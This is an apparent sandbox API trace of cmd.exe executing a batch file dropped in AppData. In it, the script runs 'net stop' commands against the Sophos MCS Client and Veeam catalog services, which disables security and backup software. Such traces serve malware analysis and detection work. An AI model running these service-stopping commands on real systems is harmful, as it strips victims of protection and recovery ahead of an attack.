(_FileHandle=0) returned 0xfffffffe [0203.853] SetConsoleMode (hConsoleHandle=0xfffffffe, dwMode=0x7) returned 0 [0203.853] SetConsoleInputExeNameW () returned 0x1 [0203.853] GetConsoleOutputCP () returned 0x1b5 [0203.853] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a984260 | out: lpCPInfo=0x4a984260) returned 1 [0203.853] SetThreadUILanguage (LangId=0x0) returned 0x409 [0203.853] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\{7BC215DC-ADE3-41CE-9940-63296E9C3DD5}\\c48c75d7__.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\{7bc215dc-ade3-41ce-9940-63296e9c3dd5}\\c48c75d7__.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x3bf254, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x78 [0203.853] _open_osfhandle (_OSFileHandle=0x78, _Flags=8) returned 3 [0203.853] _get_osfhandle (_FileHandle=3) returned 0x78 [0203.853] SetFilePointer (in: hFile=0x78, lDistanceToMove=3697, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xe71 [0203.853] GetProcessHeap () returned 0x3e0000 [0203.854] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7148 | out: hHeap=0x3e0000) returned 1 [0203.854] GetProcessHeap () returned 0x3e0000 [0203.854] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7018 | out: hHeap=0x3e0000) returned 1 [0203.854] GetProcessHeap () returned 0x3e0000 [0203.854] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6ef0 | out: hHeap=0x3e0000) returned 1 [0203.854] GetProcessHeap () returned 0x3e0000 [0203.854] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6e88 | out: hHeap=0x3e0000) returned 1 [0203.854] GetProcessHeap () returned 0x3e0000 [0203.854] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8278 | out: hHeap=0x3e0000) returned 1 [0203.854] GetProcessHeap () returned 0x3e0000 [0203.854] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4ba8 | out: hHeap=0x3e0000) returned 1 [0203.854] GetProcessHeap () returned 0x3e0000 [0203.854] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f81f8 | out: hHeap=0x3e0000) returned 1 [0203.854] GetProcessHeap () returned 0x3e0000 [0203.854] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6d58 | out: hHeap=0x3e0000) returned 1 [0203.854] GetProcessHeap () returned 0x3e0000 [0203.854] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4a80 | out: hHeap=0x3e0000) returned 1 [0203.854] GetProcessHeap () returned 0x3e0000 [0203.854] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6cf0 | out: hHeap=0x3e0000) returned 1 [0203.854] GetProcessHeap () returned 0x3e0000 [0203.854] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3ff0 | out: hHeap=0x3e0000) returned 1 [0203.854] GetProcessHeap () returned 0x3e0000 [0203.854] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a58 | out: hHeap=0x3e0000) returned 1 [0203.854] GetProcessHeap () returned 0x3e0000 [0203.854] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3f90 | out: hHeap=0x3e0000) returned 1 [0203.854] _get_osfhandle (_FileHandle=3) returned 0x78 [0203.854] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xe71 [0203.854] ReadFile (in: hFile=0x78, lpBuffer=0x4a986640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x3bf238, lpOverlapped=0x0 | out: lpBuffer=0x4a986640*, lpNumberOfBytesRead=0x3bf238*=0xa50, lpOverlapped=0x0) returned 1 [0203.854] SetFilePointer (in: hFile=0x78, lDistanceToMove=3734, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xe96 [0203.854] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a986640, cbMultiByte=37, lpWideCharStr=0x4a98c640, cchWideChar=8191 | out: lpWideCharStr="net stop ΓÇ£Sophos MCS ClientΓÇ¥ /y\r\ny\r\n/y\r\neΓÇ¥ /y\r\nures\r\nnded\r\n") returned 37 [0203.855] _get_osfhandle (_FileHandle=3) returned 0x78 [0203.855] GetFileType (hFile=0x78) returned 0x1 [0203.855] _get_osfhandle (_FileHandle=3) returned 0x78 [0203.855] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xe96 [0203.855] GetProcessHeap () returned 0x3e0000 [0203.855] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x400a) returned 0x3fdad8 [0203.855] GetProcessHeap () returned 0x3e0000 [0203.855] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3fdad8 | out: hHeap=0x3e0000) returned 1 [0203.858] _tell (_FileHandle=3) returned 3734 [0203.858] _close (_FileHandle=3) returned 0 [0203.858] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0203.858] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0203.858] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0203.858] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0203.858] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0203.858] _wcsicmp (_String1="net", _String2="CD") returned 11 [0203.858] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0203.858] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0203.858] _wcsicmp (_String1="net", _String2="REN") returned -4 [0203.858] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0203.858] _wcsicmp (_String1="net", _String2="SET") returned -5 [0203.859] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0203.859] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0203.859] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0203.859] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0203.859] _wcsicmp (_String1="net", _String2="MD") returned 1 [0203.859] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0203.859] _wcsicmp (_String1="net", _String2="RD") returned -4 [0203.859] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0203.859] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0203.859] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0203.859] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0203.859] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0203.859] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0203.859] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0203.859] _wcsicmp (_String1="net", _String2="VER") returned -8 [0203.859] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0203.859] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0203.859] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0203.859] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0203.859] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0203.859] _wcsicmp (_String1="net", _String2="START") returned -5 [0203.859] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0203.859] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0203.859] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0203.859] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0203.859] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0203.859] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0203.859] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0203.859] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0203.859] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0203.859] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0203.860] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6cf8, lpFilePart=0x3bf050 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3bf050*="Desktop") returned 0x25 [0203.860] SetErrorMode (uMode=0x0) returned 0x1 [0203.860] GetProcessHeap () returned 0x3e0000 [0203.860] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6cf0, Size=0x5c) returned 0x3f6cf0 [0203.860] GetProcessHeap () returned 0x3e0000 [0203.860] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6cf0) returned 0x5c [0203.860] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0203.860] GetProcessHeap () returned 0x3e0000 [0203.860] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f4a80 [0203.860] GetProcessHeap () returned 0x3e0000 [0203.860] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f6d58 [0203.861] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6d58, Size=0x122) returned 0x3f6d58 [0203.861] GetProcessHeap () returned 0x3e0000 [0203.861] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6d58) returned 0x122 [0203.861] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0203.861] GetProcessHeap () returned 0x3e0000 [0203.861] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f81f8 [0203.861] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f81f8, Size=0x76) returned 0x3f81f8 [0203.861] GetProcessHeap () returned 0x3e0000 [0203.861] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f81f8) returned 0x76 [0203.862] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0203.862] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0203.862] GetLastError () returned 0x2 [0203.862] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0203.863] GetLastError () returned 0x2 [0203.863] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0203.864] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0203.864] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0203.864] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0203.864] GetLastError () returned 0x2 [0203.865] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0203.865] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0203.865] GetConsoleTitleW (in: lpConsoleTitle=0x3bee1c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0203.866] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6e90, lpFilePart=0x3be93c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3be93c*="Desktop") returned 0x25 [0203.866] SetErrorMode (uMode=0x0) returned 0x1 [0203.866] GetProcessHeap () returned 0x3e0000 [0203.866] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6e88, Size=0x5c) returned 0x3f6e88 [0203.866] GetProcessHeap () returned 0x3e0000 [0203.866] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6e88) returned 0x5c [0203.866] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0203.866] GetProcessHeap () returned 0x3e0000 [0203.866] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f6ef0 [0203.866] GetProcessHeap () returned 0x3e0000 [0203.866] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f7018 [0203.867] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7018, Size=0x122) returned 0x3f7018 [0203.867] GetProcessHeap () returned 0x3e0000 [0203.867] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7018) returned 0x122 [0203.867] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0203.867] GetProcessHeap () returned 0x3e0000 [0203.867] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f7148 [0203.867] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7148, Size=0x76) returned 0x3f7148 [0203.867] GetProcessHeap () returned 0x3e0000 [0203.867] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7148) returned 0x76 [0203.867] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0203.868] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0203.868] GetLastError () returned 0x2 [0203.868] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0203.868] GetLastError () returned 0x2 [0203.869] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0203.869] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f71c8 [0203.869] FindClose (in: hFindFile=0x3f71c8 | out: hFindFile=0x3f71c8) returned 1 [0203.870] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0203.870] GetLastError () returned 0x2 [0203.870] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f71c8 [0203.870] FindClose (in: hFindFile=0x3f71c8 | out: hFindFile=0x3f71c8) returned 1 [0203.870] GetConsoleTitleW (in: lpConsoleTitle=0x3bebb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0203.871] InitializeProcThreadAttributeList (in: lpAttributeList=0x3bea38, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x3beb00 | out: lpAttributeList=0x3bea38, lpSize=0x3beb00) returned 1 [0203.871] UpdateProcThreadAttribute (in: lpAttributeList=0x3bea38, dwFlags=0x0, Attribute=0x60001, lpValue=0x3beaf8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x3bea38, lpPreviousValue=0x0) returned 1 [0203.871] GetStartupInfoW (in: lpStartupInfo=0x3be9f4 | out: lpStartupInfo=0x3be9f4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x264, hStdError=0x26c)) [0203.871] lstrcmpW (lpString1="\\net.exe", lpString2="\\XCOPY.EXE") returned -1 [0203.871] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\net.exe", lpCommandLine="net stop ΓÇ£Sophos MCS ClientΓÇ¥ /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x3bea94*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="net stop ΓÇ£Sophos MCS ClientΓÇ¥ /y", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x3beae0 | out: lpCommandLine="net stop ΓÇ£Sophos MCS ClientΓÇ¥ /y", lpProcessInformation=0x3beae0*(hProcess=0x74, hThread=0x78, dwProcessId=0x7a8, dwThreadId=0x1e8)) returned 1 [0203.875] CloseHandle (hObject=0x78) returned 1 [0203.875] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0203.875] GetProcessHeap () returned 0x3e0000 [0203.875] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0203.875] GetEnvironmentStringsW () returned 0x3f8408* [0203.875] GetProcessHeap () returned 0x3e0000 [0203.875] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0203.876] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0203.876] WaitForSingleObject (hHandle=0x74, dwMilliseconds=0xffffffff) returned 0x0 [0204.186] GetExitCodeProcess (in: hProcess=0x74, lpExitCode=0x3be9d4 | out: lpExitCode=0x3be9d4*=0x1) returned 1 [0204.186] CloseHandle (hObject=0x74) returned 1 [0204.186] _vsnwprintf (in: _Buffer=0x3beb1c, _BufferCount=0x13, _Format="%08X", _ArgList=0x3be9e0 | out: _Buffer="00000001") returned 8 [0204.186] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000001") returned 1 [0204.186] GetProcessHeap () returned 0x3e0000 [0204.186] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0204.186] GetEnvironmentStringsW () returned 0x3f8408* [0204.186] GetProcessHeap () returned 0x3e0000 [0204.186] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0204.187] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0204.187] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0204.187] GetProcessHeap () returned 0x3e0000 [0204.187] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0204.187] GetEnvironmentStringsW () returned 0x3f8408* [0204.187] GetProcessHeap () returned 0x3e0000 [0204.187] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0204.187] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0204.187] GetProcessHeap () returned 0x3e0000 [0204.187] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a70 | out: hHeap=0x3e0000) returned 1 [0204.187] DeleteProcThreadAttributeList (in: lpAttributeList=0x3bea38 | out: lpAttributeList=0x3bea38) [0204.187] _get_osfhandle (_FileHandle=1) returned 0x264 [0204.187] SetConsoleMode (hConsoleHandle=0x264, dwMode=0x0) returned 0 [0204.188] _get_osfhandle (_FileHandle=1) returned 0x264 [0204.188] GetConsoleMode (in: hConsoleHandle=0x264, lpMode=0x4a9841ac | out: lpMode=0x4a9841ac) returned 0 [0204.188] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0204.188] GetConsoleMode (in: hConsoleHandle=0xfffffffe, lpMode=0x4a9841b0 | out: lpMode=0x4a9841b0) returned 1 [0204.188] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0204.188] SetConsoleMode (hConsoleHandle=0xfffffffe, dwMode=0x7) returned 0 [0204.188] SetConsoleInputExeNameW () returned 0x1 [0204.188] GetConsoleOutputCP () returned 0x1b5 [0204.188] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a984260 | out: lpCPInfo=0x4a984260) returned 1 [0204.188] SetThreadUILanguage (LangId=0x0) returned 0x409 [0204.189] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\{7BC215DC-ADE3-41CE-9940-63296E9C3DD5}\\c48c75d7__.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\{7bc215dc-ade3-41ce-9940-63296e9c3dd5}\\c48c75d7__.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x3bf254, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0204.189] _open_osfhandle (_OSFileHandle=0x74, _Flags=8) returned 3 [0204.189] _get_osfhandle (_FileHandle=3) returned 0x74 [0204.189] SetFilePointer (in: hFile=0x74, lDistanceToMove=3734, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xe96 [0204.189] GetProcessHeap () returned 0x3e0000 [0204.189] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7148 | out: hHeap=0x3e0000) returned 1 [0204.189] GetProcessHeap () returned 0x3e0000 [0204.189] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7018 | out: hHeap=0x3e0000) returned 1 [0204.189] GetProcessHeap () returned 0x3e0000 [0204.189] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6ef0 | out: hHeap=0x3e0000) returned 1 [0204.189] GetProcessHeap () returned 0x3e0000 [0204.189] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6e88 | out: hHeap=0x3e0000) returned 1 [0204.189] GetProcessHeap () returned 0x3e0000 [0204.189] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8278 | out: hHeap=0x3e0000) returned 1 [0204.189] GetProcessHeap () returned 0x3e0000 [0204.189] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4ba8 | out: hHeap=0x3e0000) returned 1 [0204.189] GetProcessHeap () returned 0x3e0000 [0204.189] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f81f8 | out: hHeap=0x3e0000) returned 1 [0204.189] GetProcessHeap () returned 0x3e0000 [0204.189] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6d58 | out: hHeap=0x3e0000) returned 1 [0204.189] GetProcessHeap () returned 0x3e0000 [0204.189] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4a80 | out: hHeap=0x3e0000) returned 1 [0204.189] GetProcessHeap () returned 0x3e0000 [0204.189] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6cf0 | out: hHeap=0x3e0000) returned 1 [0204.189] GetProcessHeap () returned 0x3e0000 [0204.189] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3ff0 | out: hHeap=0x3e0000) returned 1 [0204.189] GetProcessHeap () returned 0x3e0000 [0204.189] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a58 | out: hHeap=0x3e0000) returned 1 [0204.189] GetProcessHeap () returned 0x3e0000 [0204.189] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3f90 | out: hHeap=0x3e0000) returned 1 [0204.190] _get_osfhandle (_FileHandle=3) returned 0x74 [0204.190] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xe96 [0204.190] ReadFile (in: hFile=0x74, lpBuffer=0x4a986640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x3bf238, lpOverlapped=0x0 | out: lpBuffer=0x4a986640*, lpNumberOfBytesRead=0x3bf238*=0xa2b, lpOverlapped=0x0) returned 1 [0204.190] SetFilePointer (in: hFile=0x74, lDistanceToMove=3763, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xeb3 [0204.190] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a986640, cbMultiByte=29, lpWideCharStr=0x4a98c640, cchWideChar=8191 | out: lpWideCharStr="net stop VeeamCatalogSvc /y\r\nΓÇ¥ /y\r\ny\r\n/y\r\neΓÇ¥ /y\r\nures\r\nnded\r\n") returned 29 [0204.190] _get_osfhandle (_FileHandle=3) returned 0x74 [0204.190] GetFileType (hFile=0x74) returned 0x1 [0204.190] _get_osfhandle (_FileHandle=3) returned 0x74 [0204.190] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xeb3 [0204.190] GetProcessHeap () returned 0x3e0000 [0204.190] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x400a) returned 0x3fdad8 [0204.190] GetProcessHeap () returned 0x3e0000 [0204.190] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3fdad8 | out: hHeap=0x3e0000) returned 1 [0204.194] _tell (_FileHandle=3) returned 3763 [0204.194] _close (_FileHandle=3) returned 0 [0204.194] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0204.194] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0204.194] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0204.194] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0204.194] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0204.194] _wcsicmp (_String1="net", _String2="CD") returned 11 [0204.194] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0204.194] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0204.194] _wcsicmp (_String1="net", _String2="REN") returned -4 [0204.194] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0204.194] _wcsicmp (_String1="net", _String2="SET") returned -5 [0204.194] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0204.194] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0204.194] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0204.194] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0204.194] _wcsicmp (_String1="net", _String2="MD") returned 1 [0204.194] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0204.194] _wcsicmp (_String1="net", _String2="RD") returned -4 [0204.194] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0204.194] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0204.194] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0204.194] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0204.194] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0204.194] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0204.194] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0204.194] _wcsicmp (_String1="net", _String2="VER") returned -8 [0204.194] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0204.194] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0204.194] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0204.194] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0204.194] 